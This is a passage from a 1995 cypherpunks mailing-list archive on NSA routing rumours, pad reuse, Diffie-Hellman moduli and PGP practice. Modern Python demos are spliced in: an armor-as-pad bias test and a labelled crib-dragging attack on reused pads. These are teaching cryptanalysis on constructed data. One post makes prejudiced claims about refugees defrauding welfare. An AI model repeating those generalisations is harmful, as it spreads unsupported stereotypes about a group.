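RADIX64 = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")


def constructed_armor(n_chars, seed=b"constructed sample"):
    """Constructed stand-in for the middle lines of `pgp -a` output:
    radix-64 text over pseudorandom bytes (SHA-256 in counter mode, so the
    run is repeatable). Line breaks are left out for simplicity."""
    n_raw = 3 * ((n_chars + 3) // 4)          # multiple of 3: no '=' padding
    blocks = (n_raw + 31) // 32
    raw = b"".join(hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
                   for i in range(blocks))[:n_raw]
    return base64.b64encode(raw)[:n_chars]


def entropy_bits_per_byte(data):
    """Empirical Shannon entropy of the byte values in data."""
    total = len(data)
    return -sum(c / total * math.log2(c / total) for c in Counter(data).values())


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def candidates(cipher_byte, printable_only=True):
    """Plaintext byte values still possible for one ciphertext byte when the
    pad byte is known to be a radix-64 symbol."""
    possible = {cipher_byte ^ k for k in RADIX64}
    if printable_only:
        possible = {p for p in possible if 0x20 <= p <= 0x7E}
    return possible


def analyse(message):
    """Use the armor text as an XOR pad on message and measure what leaks."""
    pad = constructed_armor(len(message))
    cipher = xor(message, pad)
    sizes = [len(candidates(c)) for c in cipher]
    return {
        # A true one-time pad would show 256 symbols and about 8 bits per byte.
        "pad_symbols": len(set(pad)),
        "pad_entropy": entropy_bits_per_byte(pad),
        # A true pad leaves all 95 printable values possible at every position.
        "max_candidates": max(sizes),
        "mean_candidates": sum(sizes) / len(sizes),
        # Every armor symbol is below 0x80, so bit 7 passes through unchanged.
        "high_bit_leaks": all((c ^ m) & 0x80 == 0 for c, m in zip(cipher, message)),
        "plaintext_always_listed": all(m in candidates(c)
                                       for c, m in zip(cipher, message)),
    }


# Constructed sample plaintext, repeated to give the statistics some volume.
SAMPLE = b"Meet me at the usual place at nine. Bring the signed forms. " * 64

if __name__ == "__main__":
    for key, value in analyse(SAMPLE).items():
        print(f"{key:24} {value}")
```

Decoding the armor back to binary removes this particular bias, but the bytes are then cipher output derived from a short session key, so the result is only as strong as that cipher and is not a one-time pad.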





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 5 Nov 1995 19:17:23 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <47i5na$24d@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511050620.HAA14046@utopia.hacktic.nl>,
Anonymous <nobody@REPLAY.COM> wrote:
> I'm sure some of you will have seen this, so sorry to toss logs on the
> listburn fire; still, it seemed worth reposting to CP--no, it's not
> entirely crypto-related, but nor is it a completely vague allegation.

It's specious.

> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)"

Belonging to the EUnet backbone, apparently run by people who don't care
much about DNS.

Actually, I resolve 134.222.9.1 as `Amsterdam4.NL.EU.net'.  I can ping
it, but not 134.222.35.2.  134.222.35/24 also does not appear in the
RIPE registry.  I'm going to conclude that it was a temporary thing EUnet
set up for some reason.  It seems to have been replaced by amsterdam6,
134.222.228.13.

> > -- then through the same
> >  Vienna, Virginia (USA) site ...

...a major router at a major interconnect run by UUNET, a major provider.
datasrv apparently contracted with UUNET for traffic.  Naturally it would
go through their network, which is centered in the US.

Why isn't the NSA tapping biu.ac.il, a central Israeli news site?
Routing from Net99 to them is through IBM.

> >  The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information
> >  report, ``No match for "134.222.9.1". '' and `` No match for
> >  "134.222.35.2".''

They are not comprehensive.  You need to look up the network.

This is silly.  If the NSA were monitoring traffic with the consent of
EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they
wouldn't need to play these routing games; they'd just eavesdrop at an
interconnect or on the leased lines leading into it, run a rough filter
over it to cut down volume, and tunnel the traffic home through other
channels (probably satellite).  And if they were monitoring without the
consent of UUNET and EUnet, they still wouldn't play these games because
the providers would be upset about the unexpected load on the expensive
and overloaded transatlantic pipes.

Finally, we all know how easy sniffing is at the local (LAN, ISP LAN,
and especially telco) level.  And we know that end-to-end encryption
is the way to go.  So what would we have learned if we knew the NSA
was eavesdropping?

Just *assume* the NSA is out to get you, design systems that resist
attack, and then you can stop caring about whether you're the target.

And tell your vendor you want Kerberos or IPSEC.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:14:44 +0800
To: "William Allen Simpson" <bsimpson@morningstar.com>
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1973.bsimpson@morningstar.com>
Message-ID: <199511051607.LAA08575@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"William Allen Simpson" writes:
> Folks, I was somewhat disappointed in the response to our previous
> requests for verification of the strength of the prime moduli.
> 
> Recently, someone asked for a smaller prime of only 512-bits for speed.
> This is more than enough for the strength of keys needed for DES, 3DES,
> MD5 and SHA.  Perhaps this would be easier to have more complete and
> robust verification as well.

I think that this is a very large mistake. Allow me to explain why.

La Macchia (sp?) and Odlyzko (sp?) have a very nice result which shows
that once you've done enough precalculation on a particular modulus,
you can break any subsequent Diffie-Hellman operation performed on
that modulus with (for our purposes) no effort. 512 bits is, from what
I can tell, not far out of the realm of possibility for what someone
could try to crack with current machines given enough effort.

[Sorry about the spelling. I'm tired, and don't have time to look up
your names. I know that Brian at least reads this list and I'm sorry
about likely misspelling your name.]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:19:20 +0800
To: James Black <black@eng.usf.edu>
Subject: Re: using PGP only for digital signatures
In-Reply-To: <Pine.SUN.3.91.951104155911.2413A-100000@fourier>
Message-ID: <199511051611.LAA08586@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



James Black writes:
>   I am in a discussion (during the week) with a system administrator 
> about seeing if we can just make PGP publicly available to everyone, 
> but now the discussion seems to be to just allow PGP to do digital 
> signatures, and I don't think that is the best choice, then.  They are 
> not against PGP being used, but there are legal issues as to whether they 
> can offer it to everyone, as some students are international students, 
> and are not allowed to use the version for the US, or so I have been 
> informed, so now I need to see if we can have the international version, 
> so these students can use it. :(

Actually, nothing in the ITAR says foreigners can't USE the
U.S. version of PGP, just that you can't give them the software.

However, I think it is a bad idea to make PGP available on a multiuser
computer. It encourages a very, very bad habit -- that of using PGP on
a multiuser computer....

> What they are trying to do is make certain that no 
> one can send a message to anyone, claim to be in the faculty, and cause 
> problems that way.

But since you are using this software on a multiuser computer over
likely insecure lines, or, even worse, over an insecure LAN, all you
are going to do is make things even stickier when someone steals a key
and starts pretending to be some faculty member anyway.

Don't use public key software on untrusted hardware over insecure
links. It's a BAD BAD BAD thing.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: consumer products that make nice sources
In-Reply-To: <v02120d00acc195427273@[205.164.159.32]>
Message-ID: <199511051620.LAA08607@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lots of people are discussing all sorts of weird sources of radioactive
material to use in a detector for an RNG.

None of this is necessary. Scientific supply houses will happily sell
you small calibrated sources for use in your lab, classroom, or in our
case, machine room (:-).  There is no need to find objects to
dismantle or silly dangerous radioactive sources. You can get a source
that produces exactly as much activity as you need very cheaply.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:46:11 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Credentials Without Identity
In-Reply-To: <acc154b62202100420bc@[205.199.118.202]>
Message-ID: <199511051639.LAA08639@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> (And as a measure of how apologetic some folks are getting about discussing
> anything not on Perry's List of Approved Topics,
[....]
> In fact, the issue of credentials
> and identity is NOT off-topic, not even semi-off-topic. It is central to
> the themes of our list. I urge all to read Chaum's seminal work on
> "credentials without identity.")

I've repeatedly stated, Tim, that my problem is with junk, not with
stuff on list charter. You can claim anything you like about my
statements, but it won't be true. Any statement to the effect that I'm
against discussion of anonymous credentials is a "big lie" -- an
attempt to distort what I have said by being sufficiently outrageous.

Repeating, I am troubled by people posting stuff about whether
roadways should be privatized -- I am perfectly happy with discussion
of Chaumian anonymous credentials. My problem is with people who think
this is Libernet, or Waconet, or Fosternet, or IBM MicroKernel net, or
Internet Investing Net, or what have you. I also find the beating of
dead horses unfortunate, but I never complain about it since it's
usually technically on topic.

Now, Tim, if you feel people should be able to post their questions
about system administration of Unix boxes here, as in fact happened
only last week, please speak up.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 00:55:55 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Telephone switch capacity -Reply
In-Reply-To: <v02120d02acc1d4859dfc@[192.0.2.1]>
Message-ID: <199511051645.LAA08650@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:
> One more time. Despite what you read in the papers, despite what most
> people - even in the legal profession - believe, telephone wiretaps do
> _not_ require a court order. They haven't required a court order in over a
> year.

They never required a conventional court order. This was not new. They
always had a national security escape clause. However, at least they
cannot be used in court unless there was a court order involved, and
the process of getting "legitimate" authorization to, say, bug the
embassy phones, does require that certain forms be followed.

The real problem, IMHO, is that people can avoid the formalities
entirely and simply unlawfully wiretap, and that tracing such attempts
is hard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 01:21:03 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: using pgp to make an otp
In-Reply-To: <Pine.SOL.3.91.951104211722.6970F-100000@chivalry>
Message-ID: <199511051710.MAA08683@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> On the subject of reused one-time-pads: What are the attacks that become 
> available if a pad is used two times. The ones I can think of are:

I will point out that the NSA's VENONA project, which among other
things led indirectly to the execution of the Rosenbergs, got its
only break from the two time use of one time pads by the Soviet
spies. I can't guess all the techniques they used, but obviously there
are enough things you can do to make it dangerous.

Perry
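
Why a pad used twice is dangerous, as an added example (not part of the original message, and not a reconstruction of the VENONA work): XORing the two ciphertexts cancels the pad and leaves only the XOR of the two plaintexts, so a correctly guessed word in one message exposes the aligned text of the other. The messages and pad are constructed, and `PadBook` is a hypothetical allocator showing the corresponding safeguard of never handing out the same pad bytes twice.

```python
import hashlib

ALLOWED = set(b"abcdefghijklmnopqrstuvwxyz .")   # what plausible text looks like here

# Constructed sample messages of equal length.
P1 = b"the quarterly report is due on friday noon"
P2 = b"please send the report to the head office."


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def constructed_pad(n, seed=b"constructed pad"):
    """Constructed stand-in for pad material (SHA-256 in counter mode)."""
    out = b"".join(hashlib.sha256(seed + i.to_bytes(4, "big")).digest()
                   for i in range((n + 31) // 32))
    return out[:n]


def crib_drag(c1, c2, crib):
    """Slide a guessed word along c1 XOR c2. Wherever the guess matches one
    message, XORing it out leaves the other message's text at that offset."""
    mixed = xor(c1, c2)                      # the pad has cancelled out
    hits = []
    for off in range(len(mixed) - len(crib) + 1):
        frag = xor(mixed[off:off + len(crib)], crib)
        if all(b in ALLOWED for b in frag):  # keep only text-like fragments
            hits.append((off, frag))
    return hits


def reuse_demo(crib=b" report "):
    """The mistake: both messages encrypted with the same pad bytes."""
    pad = constructed_pad(len(P1))
    c1, c2 = xor(P1, pad), xor(P2, pad)
    return c1, c2, crib_drag(c1, c2, crib)


class PadBook:
    """Hands out pad bytes exactly once and refuses when the pad runs out."""

    def __init__(self, material):
        self._material = material
        self._next = 0

    def take(self, n):
        if self._next + n > len(self._material):
            raise ValueError("pad exhausted: get new pad material, never rewind")
        chunk = self._material[self._next:self._next + n]
        self._next += n
        return chunk

    def encrypt(self, message):
        """Return (pad offset, ciphertext); the receiver needs the offset."""
        start = self._next
        return start, xor(message, self.take(len(message)))


if __name__ == "__main__":
    c1, c2, hits = reuse_demo()
    print("pad cancels:", xor(c1, c2) == xor(P1, P2))
    for off, frag in hits:
        print(f"offset {off:2}: {frag!r}")
```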




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 01:22:05 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
In-Reply-To: <199511050620.HAA14046@utopia.hacktic.nl>
Message-ID: <199511051713.MAA08691@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> >  Notice that both messages went through an unnamed site -- 134.222.9.1 and
> >  then a strangely-named site, "lp (134.222.35.2)"
[...]
> >  Now let me see ... which spy agencies are located in or near Virginia?

The existence of MAE East in Virginia is far more significant.

I'm sure the spooks are spying, but they are likely just tapping
lines. Machines that don't have proper reverse maps show up every day
in large networks and aren't something to worry about. Your posting is
based on the premise that this unnamed machine is of significance --
and it almost certainly isn't of any significance.

Quit looking for the spooks where they aren't. You should always
assume your line is being tapped if you are saying something you don't
want heard, anyway.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Mon, 6 Nov 1995 01:52:10 +0800
To: cypherpunks@toad.com (Good Guys)
Subject: Public Reviews of CheckFree Wallet system?
Message-ID: <199511051743.MAA11416@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is some more information on the Checkfree Wallet (tm) system. I've
learned about it from some reporting I've been doing on it.

1) Has there been any public review of this product?

Here is the basic run down

It uses a 768-bit key. They claim it is not escrowed with the US
government. It is exportable to most countries except for Sudan, Cuba,
North Korea, Syria, Libya, Iraq or Iran.

It encrypts limited bits of information (like Credit Card Numbers)
which is why they claim it was able to get export approval.

User configures the Wallet(tm) by downloading and installing and
configuring it. It works with Proxy servers which I have
successfully tested.

It generates a public and private key pair using RSA technology.

It keeps the payer anonymous to the merchant via the internet. Merchants
can learn the payer's name out of band (e.g., by phone).

No credit card info is stored on a merchant's site.

Payment is encrypted and signed by the payer and sent to the merchant
who adds their version of the transaction and their signature. It is
forwarded to Checkfree who then decrypt, compare the payer's and
merchant's view of the transaction and if they agree process it.

Its use is very very quick and easy. It auto configures itself to
Netscape. Payment information is sent to the Wallet (TM) from the
merchant in a Mime segment, which triggers a launch of the Wallet, the
payer binds in their credit card data (already at Checkfree (at
installation)), e.g., which card to use. Then the whole thing is sent to
the merchant then on to Checkfree for processing as indicated
above.

I was very impressed with the software and its ease of use. Currently
only works on Windows but soon on the Mac.

/hawk

  --
                Harry Hawk
                Manager of Interactive Communications
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 6 Nov 1995 02:31:40 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511051821.NAA20156@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@piermont.com ("Perry E. Metzger") on 
Sun, 05 Nov 12:13 PM

>Quit looking for the spooks where they aren't. You 
>should always  assume your line is being tapped if you 
>are saying something you don't  want heard, anyway.


   True, it's not Smokey behind the billboard, blinked at you
   by oncoming headlights, it's the sensors in the roadbed
   that reads your tag -- when it leaves your home-ain, then
   at the remailer donkeystops, then at your recreational
   stash-house, at the pedo-filmery, at the Semtex-Pantex
   workhide, at the digi-wallet-copyfast, right into
   ananonymous Ken-Barbie's e-slot.

   TLA-Smokey is friendly, maybe intra-humanly let you off
   with a warning, not the anonymous high-techery, it responds
   only to its friend, the tag -- tracing, storing, mutating
   the whinefleshers, 0's by 1's.

   That's the how, maybe, but for who or what or why?

   Or is it just machines feeding machines incomprehensibles?
















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Sun, 5 Nov 1995 20:47:28 +0800
To: cypherpunks@toad.com
Subject: Re: Credentials Without Identity
In-Reply-To: <acc1ae3828021004292e@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.951105123707.4854A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


(PRIVATE mail, taken from the cp-list)

I choose to make these 'off-topic' comments off the record:
 
(By the way, please keep on 'crypto-moderating' the list
 your way; it makes much more sense - and is much more
 effective! - than Perry's.)
 
> Fortunately, I have heard there is a "right wing" backlash growing in some
> of the Scandinavian countries, especially Norway and Denmark. ("Right wing"
> is what the press calls it...I hope it's really "anti-left wing,"
> anti-cradle-to-grave-socialism.)

Well, also in Sweden, but this is merely against tax money transferred to
the 'less fortunate' (or 'lazy', as you sometimes call them) and is very
little, if at all, connected to anti-surveillance. Cross-referencing
various databases would actually be good for catching those who receive,
for example, unemployment money while actually working full time (especially
common amongst Mediterranean and Middle East 'political' refugees - many
of whom like to come here and work for a handful of years, sometimes adding
a decade to their actual age so they can go home to a warm climate at 55
to live as kings on their Swedish pensions). Isn't this a dilemma, also at
your home turf? FINCEN efficiency might save some of your tax dollars.

> To my surprise, several people on this list have expressed support for the
> need for so-called "data privacy laws." I look at it this way: if I put

I completely agree with you - actually, I think I took over some arguments
from you on this subject long ago - that these laws are bullshit.

> lists. Ironically, the Cypherpunks mailing list might be illegal in the
> U.K. unless the legal forms were properly filled out, the fees paid, the
> parties notified on a regular basis of information about them, etc. And our

This applies very much so in Sweden too. It *is* illegal to maintain any
database with 'information on persons' (like their email addresses) without
approval from the Data Inspection. But it's an open secret that this law
is broken on a massive front and no bureaucrat is really trying to uphold it.

> "Disneyland with a death penalty"

Yes, we live in interesting times.


Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jwarren@well.com (Jim Warren)
Date: Mon, 6 Nov 1995 06:44:42 +0800
To: Stephen Whitaker <cypherpunks@toad.com
Subject: Re: whose watchin the watchers -- I GOT THE EXPLANATIONS OKAY
Message-ID: <v02120d1bacc2e9d5eaf4@[206.15.66.109]>
MIME-Version: 1.0
Content-Type: text/plain


At 04:19 PM 11/05/95, Stephen Whitaker wrote:
>The following is an excerpt from Jim Warren's listserv, GovAccess 183.
>
>Are there folks on this list who have insights or definitive information on
>this topic?
>
>Are there ways for someone with access to modify router tables to constantly
>create alternate paths at other routers which would serve to end-around any
>such snoops?
>
>***********begin_included_text*************************
>
>&&&&&&&&&&&&&&&&&&&&
>
>
>Is Someone Already Watching All International Net Traffic?
>
>The following is the transcript of an actual communications trace that a
>friend ran, while I was sitting next to him, watching -- reprinted here
>with his permission.
>
>He did a "traceroute" of two messages that he sent from his machine in
>Switzerland ...




Folks,

I've received ample explanations/corrections to my naive paranoia.

The following will be posted in GovAccess.184, within an hour or two.

Many thanks.

--blushing-jim
Jim Warren, GovAccess list-owner/editor (jwarren@well.com)
Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc.
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>

[puffery:  John Dvorak Lifetime Achievement Award (1995); James Madison
Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal.
(1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994);
Pioneer Award, Electronic Frontier Foundation (its first year, 1992);
founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).]

=== EXPLANATION OF WHAT GOVACCESS IS & WHERE TO FIND ITS ARCHIVES ===

GovAccess is a list distributing irregular info & advocacy regarding
technology and civil liberties, citizen access to government - and
government access to citizens, covert and overt.

To add or drop GovAccess, email to  Majordomo@well.com  ('Subject' ignored)
with message:  [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message:  info GovAccess





===this will be posted in GovAccess.184===

Enlightenment Regarding European Net Traffic Flowing Through Numbered Sites

If I'm gonna let my net-surveillance paranoias burn brightly, I better
learn more about the technology.  Which is to say, I goofed:

In #183, yesterday eve, I flamed forth about how a friend traced his
messages from Switzerland to San Jose CA and to Israel -- and discovered
that they "went through an unnamed site -- 134.222.9.1 and then a
strangely-named site, "lp (134.222.35.2)" -- then through the same Vienna,
Virginia (USA) site ... and thereafter, on to their destination."

With beady eye and suspicious mind, I then intoned, "Now let me see ...
which spy agencies are located in or near Virginia?"


Well, half a dozen net-*literate* technoids quickly corrected the errors of
my ways:

>Date: Sun, 5 Nov 1995 08:25:17 +0100
>Subject: GA183 booboo
>To: jwarren@well.com
>From: nobody@REPLAY.COM (Anonymous)   [apparently an anonymous remailer --jim]
>Organization: RePLaY aND CoMPaNY UnLimited
>XComm: Replay may or may not approve of the content of this posting
>XComm: Report misuse of this automated service to <postmaster@REPLAY.COM>
>
>Jim--
>      Great work, but you've got to be more careful. ...
>
>I ran it by Cypherpunks and, within a half-hour, got ... [among others] ...
>
>From: Richard Huddleston <reh@wam.umd.edu>
>Date: Sun, 5 Nov 1995 01:55:09 -0500
>To: cypherpunks@toad.com, nobody@REPLAY.COM
>Subject: Re: lp (134.222.35.2)?
>Sender: owner-cypherpunks@toad.com
>
>134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0
>(instead of the individual IP addresses) you find:
>
>European Unix Users Group (NET-EUNET-X25)
>   Kruislaan 413
>   NL-1098 SJ Amsterdam
>   NETHERLANDS
>...

and

>X-Pgp-Fingerprint: 01107BAB1C85F1B49358D98FEAD4339E
>Date: Sat, 4 Nov 1995 23:01:42 -0800
>To: cypherpunks@toad.com
>From: Stephan Somogyi <somogyi@digmedia.com>
>...
>>>  Now let me see ... which spy agencies are located in or near Virginia?
>
>Oh please.
>
>The probable reason that the InterNIC doesn't know about the
>132.222.0.0 networks is because they're in Europe. If you search for
>either of the network numbers of the IP addresses mentioned above in
>the RIPE database <http://www.ripe.net/>, you will find that they
>belong to the EUnet backbone.
>
>After pinging 134.222.9.1 successfully, I telnetted to it and it
>claimed, quite plausibly, that it's a device (presumably a router) in
>Amsterdam. I am currently unable to ping 134.222.35.2; this, however,
>fills me with no dread whatsoever.
>
>Stephan Somogyi               Senior Editor               Digital Media

and

>Date: Sun, 05 Nov 1995 13:42:55 -0800
>From: John Fricker <jfricker@vertexgrp.com>
>Subject: Return of Paranoia and Vienna
>
>Using nslookup to reverse resolve 134.222.15.2 reveals it to be
>"Oslo1.NO.EU.net" and 134.222.9.1 to be "Amsterdam4.NL.EU.net".
>
>Now this doesn't mean they are not nefarious, packet sniffing spy-boxes
>since I doubt the spooks would name their routers
>"cloak-and-dagger1.cia.gov".
>
>It still is strange that it is cheaper for UUnet/EUnet to route traffic
>across the Atlantic to get to Israel instead of developing a continental
>backbone. In many ways the architecture of the Internet is still rather
>primitive.
>
>john fricker
>dir research and development
>The Vertex Group, Inc.

followed by

>Date: Sun, 05 Nov 1995 13:23:06 -0800
>From: John Fricker <jfricker@vertexgrp.com>
>Subject: Paranoia and Vienna
>
>Now, Jim I think you're a touch paranoid here. And after reading the
>latest about the FBI wire tap bill I don't blame you ;)
>
>134.222.0.0 is in the EU domain so most likely both of those routers are
>European. The packets then went into UU Net Technologies Vienna hub. I did
>a traceroute from me to 193.8.230.64 and went through two EU.net routers
>in Vienna, VA. Vienna must be one fiberous town! Sure would make for a
>nice little listening post for nosy ears. I don't know off hand the
>relationship between EUnet and UUnet but I would guess that they are more
>than just friendly. Microsoft bought a minority interest in UUnet which
>inspired UUnet to grow rapidly. (Now there's another tidbit for paranoia!)

===

Oh ... sez I <blushing>.


So the remaining question was -- why would a msg from Switzerland go
through Alternet in Virginia on its way to Israel?  I asked several of the
[many] folks who enlightened me re the numbered sites, and within minutes,
got back:

>From: Tim Pozar <pozar@kumr.lns.com>
>Date: Sun, 5 Nov 1995 11:28:44 -0800 (PST)
>
>...
>> So the only remaining question is ... why should a Swizz msg go thru
>> Alternet in Virginia in order to get to Israel?
>
>A number of links go through there.  Most of this is tied up with
>politics and policies with the links that go over to Europe and
>little to do with the NSA. ...

Which leaves me without any inflammatory paranoia at all ... except to
wonder about those "politics and policies" that cause traffic from and to
European sites to flow through a site near the NSA and CIA.

===

To which, I just received this additional response -- email traffic's hot
'n' heavy (sender prefers to be anon :-):

Almost certainly just a matter of available capacity or administrative
issues.  There may be higher bandwidth routes available from both of those
points to the U.S., rather than directly to each other, so the traffic is
routed that way.  There are often administrative issues too--that is,
sometimes the direct routes are controlled by some company or group to which
a different net doesn't subscribe, and they have to route differently,
through entities that they both subscribe to or have agreements with (e.g.
Alternet).  This happens a bunch in Europe (and here for that matter--it's
part of the reason that some traffic from L.A. to S.F. used to route through
Atlanta or NY or similar places--and still can (depending on the service
providers).  The topology of the net is "logically" sensible, but not
necessarily geographically so...


--spooky jim, who can't tell a carburetor from a crankshaft, net-wise


&&&&&&&&&&&&&&&&&&&&


Net Police, Take Note:  Net is the Fastest Self-Correcting Human System I Know

On the upside of the above notes is that they [again] illustrate how
quickly the net corrects erroneous postings -- which is my answer to all
those who howl for censorship or content-control of the net, "because it
distributes incorrect information."

It does -- but it also distributes, uh, "vigorous" corrections to any iota
of intended or naive imperfection in a posting, at least to the extent that
such postings receive significant circulation on the net.  (And if they
don't, then they are little different than the erroneous information that
people exchange by voice and phone, every day.)

And woe be unto the reputation of anyone who appears to have posted
*intentionally* incorrect or biased-incomplete information -- who get
vigorously torched in the process of getting corrected.  :-)

I think it was John Perry Barlow who observed that, the best way to get a
question answered on the net, was to post it in the form of an erroneous
statement.

--jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Sun, 5 Nov 1995 21:40:33 +0800
To: cypherpunks@toad.com
Subject: Re: lp (134.222.35.2)?
Message-ID: <199511051334.OAA22080@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



[..]
: This is silly.  If the NSA were monitoring traffic with the consent of
: EUnet and UUNET (and note that EUnet is owned by UUNET rival PSI), they
: wouldn't need to play these routing games; they'd just eavesdrop at an
: interconnect or on the leased lines leading into it, run a rough filter
: over it to cut down volume, and tunnel the traffic home through other
: channels (probably satellite).  And if they were monitoring without the
: consent of UUNET and EUnet, they still wouldn't play these games because
: the providers would be upset about the unexpected load on the expensive
: and overloaded transatlantic pipes.

PSI has an 11% stake in EUnet, since they took over EUnet Britain; 11% doesn't
qualify as 'owning' where I live.

Regards,
-AJ-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Mon, 6 Nov 1995 05:28:19 +0800
To: cypherpunks@toad.com
Subject: whose watchin the watchers
Message-ID: <199511052119.QAA28698@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


The following is an excerpt from Jim Warren's listserv, GovAccess 183.

Are there folks on this list who have insights or definitive information on
this topic?

Are there ways for someone with access to modify router tables to constantly
create alternate paths at other routers which would serve to end-around any
such snoops?

***********begin_included_text*************************

&&&&&&&&&&&&&&&&&&&&


Is Someone Already Watching All International Net Traffic?

The following is the transcript of an actual communications trace that a
friend ran, while I was sitting next to him, watching -- reprinted here
with his permission.

He did a "traceroute" of two messages that he sent from his machine in
Switzerland (he'd telneted into it while we were at a computer conference
in California).

Traceroute automatically reports each Internet node through which a message
passes, as it proceeds from origin to destination.

He did two traceroutes.  The first was from Switzerland to an addressee at
Netcom in San Jose, California.  The second was from Switzerland to an
addressee in Israel.


Date: Fri, 21 Apr 95 02:54:58 +0200
From: kelvin@fourmilab.ch (John Walker)
To: jwarren@well.com
Subject: Traceroute

> /usr2/kelvin> traceroute netcom11.netcom.com
traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40 byte packets
 1  eunet-router (193.8.230.64)  2 ms  2 ms  2 ms
 2  146.228.231.1 (146.228.231.1)  326 ms  345 ms  307 ms
 3  Bern5.CH.EU.NET (146.228.14.5)  447 ms  408 ms  364 ms
 4  146.228.107.1 (146.228.107.1)  127 ms  37 ms  36 ms
 5  Zuerich1.CH.EU.NET (146.228.10.80)  37 ms  38 ms  175 ms
 6   (134.222.9.1)  65 ms  109 ms  252 ms
 7  lp (134.222.35.2)  196 ms  179 ms  405 ms
 8  Vienna1.VA.ALTER.NET (137.39.11.1)  191 ms  179 ms  313 ms
 9  fddi.mae-east.netcom.net (192.41.177.210)  336 ms  204 ms  303 ms
10  t3-2.dc-gw4-2.netcom.net (163.179.220.181)  182 ms  251 ms  187 ms
11  t3-2.chw-il-gw1.netcom.net (163.179.220.186)  305 ms  586 ms  518 ms
12  t3-2.scl-gw1.netcom.net (163.179.220.190)  537 ms  693 ms  797 ms
13  t3-1.netcomgw.netcom.net (163.179.220.193)  698 ms  549 ms  754 ms
14  netcom11.netcom.com (192.100.81.121)  890 ms  1922 ms  1696 ms

> /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40 byte packets
 1  eunet-router (193.8.230.64)  2 ms  3 ms  2 ms
 2  146.228.231.1 (146.228.231.1)  933 ms  853 ms  874 ms
 3  Bern5.CH.EU.NET (146.228.14.5)  1040 ms  450 ms  525 ms
 4  146.228.107.1 (146.228.107.1)  453 ms  424 ms  188 ms
 5  Zuerich1.CH.EU.NET (146.228.10.80)  64 ms  61 ms  47 ms
